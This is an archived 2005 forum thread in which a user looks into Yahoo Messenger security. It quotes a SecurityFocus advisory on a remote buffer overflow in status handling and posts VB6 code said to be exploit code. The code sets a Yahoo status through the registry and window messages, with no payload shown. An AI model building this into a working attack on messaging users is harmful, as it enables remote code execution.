Welcome Guest ( Log In | Register )



 
 Reply to this topicStart new topic
> Yahoo Messenger Exploits?, Does anyone know of any exploits in YMSG
tansqrx
post Apr 25 2005, 09:21 PM
Post #1


Super Member
Group Icon

Group: [HOSTED]
Posts: 521
Joined: 25-April 05
Member No.: 4,374
Here's the question. Do you know of any exploits in Yahoo Messenger? The reason that I am asking is I have done quite a bit of research into the security of Messenger over the last 6 months. Actually the reason that I am trying to get web space is to publish some of my findings. I have mapped many of the Yahoo protocol packets and researched several common booters. Once I have the space I will dish out all the details. Do I have any similar Yahoo Messenger enthusiasts around that might be willing to discuss Messenger security?
Go to the top of the page
 
+Quote Post
saxsux
post Apr 26 2005, 06:59 AM
Post #2


Bursting with vegany goodness!
Group Icon

Group: Members
Posts: 342
Joined: 8-April 05
From: Norwich, UK
Member No.: 3,753
I don't use Yahoo Messenger much, Google offer a much better alternative - Hello! www.hello.com
Go to the top of the page
 
+Quote Post
tansqrx
post Apr 28 2005, 07:40 PM
Post #3


Super Member
Group Icon

Group: [HOSTED]
Posts: 521
Joined: 25-April 05
Member No.: 4,374
Google? I'm talking about Yahoo Messenger not the search engine.
Go to the top of the page
 
+Quote Post
tansqrx
post Apr 28 2005, 07:45 PM
Post #4


Super Member
Group Icon

Group: [HOSTED]
Posts: 521
Joined: 25-April 05
Member No.: 4,374
Looks like I may have dug up something on my own. I searched the Full Disclosure Mailing list and found an entry at Security Focus.

Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/12750

QUOTE
It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.

It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.

An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application.


QUOTE
bugtraq id 12750
object 
class Boundary Condition Error
cve CVE-MAP-NOMATCH

remote Yes
local No
published Mar 08, 2005
updated Mar 08, 2005
vulnerable Yahoo! Messenger 4.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.0 .1232
Yahoo! Messenger 5.0 .1065
Yahoo! Messenger 5.0 .1046
Yahoo! Messenger 5.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.5 .1249
Yahoo! Messenger 5.5
Yahoo! Messenger 5.6 .0.1358
Yahoo! Messenger 5.6 .0.1356
Yahoo! Messenger 5.6 .0.1355
Yahoo! Messenger 5.6 .0.1351
Yahoo! Messenger 5.6 .0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 6.0 .0.1921
Yahoo! Messenger 6.0 .0.1750
Yahoo! Messenger 6.0 .0.1643
Yahoo! Messenger 6.0

not vulnerable


Does anyone have additional info on this exploit? Is it still valid?
Go to the top of the page
 
+Quote Post
tansqrx
post Apr 28 2005, 07:54 PM
Post #5


Super Member
Group Icon

Group: [HOSTED]
Posts: 521
Joined: 25-April 05
Member No.: 4,374
This is a quick reply but I have some code questions. After downloading the exploit code from Security Focus I am left with more questions than answers. Below is the code snipet. I know that most expolits are published with lines missing or something important changed to keep the script kiddies from using the exploit. My problems is that this is VB 6 code and I am out of my element on this one. Could someone look at the code and see if it makes sence to them.

CODE
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function PlaySoundData Lib "winmm.dll" Alias "PlaySoundA" (lpData As Any, ByVal hModule As Long, ByVal dwFlags As Long) As Long
Public Declare Function ReleaseCapture Lib "user32" () As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (pDest As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Const BM_SETCHECK = &HF1
Public Const BM_GETCHECK = &HF0
Public Const CB_GETCOUNT = &H146
Public Const CB_GETLBTEXT = &H148
Public Const CB_SETCURSEL = &H14E
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDNEXT = 2
Public Const GW_CHILD = 5
Public Const LB_GETCOUNT = &H18B
Public Const LB_GETTEXT = &H189
Public Const LB_SETCURSEL = &H186
Public Const SW_HIDE = 0
Public Const SW_MAXIMIZE = 3
Public Const SW_MINIMIZE = 6
Public Const SW_NORMAL = 1
Public Const SW_SHOW = 5
Public Const VK_SPACE = &H20
Public Const WM_CHAR = &H102
Public Const WM_CLOSE = &H10
Public Const WM_COMMAND = &H111
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONDBLCLK = &H203
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_MOVE = &HF012
Public Const WM_RBUTTONDOWN = &H204
Public Const WM_RBUTTONUP = &H205
Public Const WM_SETTEXT = &HC
Public Const WM_SYSCOMMAND = &H112
Const ERROR_SUCCESS = 0&
Const REG_SZ = 1
Const REG_DWORD = 4
Public Enum HKeyTypes
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_USER = &H80000001
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
HKEY_PERFORMANCE_DATA = &H80000004
End Enum

Sub YStatus(Status As String)
Dim Name As String
Name = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id")
Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" + Name + "\Custom Msgs", 1, Status)
Dim X As Long
On Error Resume Next
X = FindWindow("YahooBuddyMain", vbNullString)
SendMessageLong X, &H111, 388, 1&
End Sub

Sub YCap(cap As String)
Dim yahoobuddymain As Long
yahoobuddymain = FindWindow("yahoobuddymain", vbNullString)
Call SendMessageByString(yahoobuddymain, WM_SETTEXT, 0&, cap)
End Sub

Public Function GetString(hKey As HKeyTypes, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
Dim lValueType As Long
r = RegOpenKey(hKey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function

Public Sub SaveString(hKey As HKeyTypes, strPath As String, strValue As String, strData As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(hKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strData, Len(strData))
r = RegCloseKey(keyhand)
End Sub
Go to the top of the page
 
+Quote Post
« Next Oldest · Security issues & Exploits · Next Newest »
 

Fast ReplyReply to this topicStart new topic

Collapse

> Similar Topics

Topics Topics
  1. Elm And Mplayer Exploits!(0)
  2. AOL Instant Messenger Chain Virus(12)
  3. Yahoo Group Worm(7)
  4. Yahoo! Messenger Unspecified Activex Buffer Overflow(1)
  5. Critical Bug In Yahoo! Messenger Webcam Activex(3)


 

Display Mode: Standard · Switch to: Linear+ · Switch to: Outline

Track this topic · Email this topic · Print this topic · Subscribe to this forum

- Lo-Fi Version Time is now: 30th August 2008 - 04:43 PM
Powered By IP.Board 2.2.1 © 2008  IPS, Inc.
Licensed to: Xisto Corporation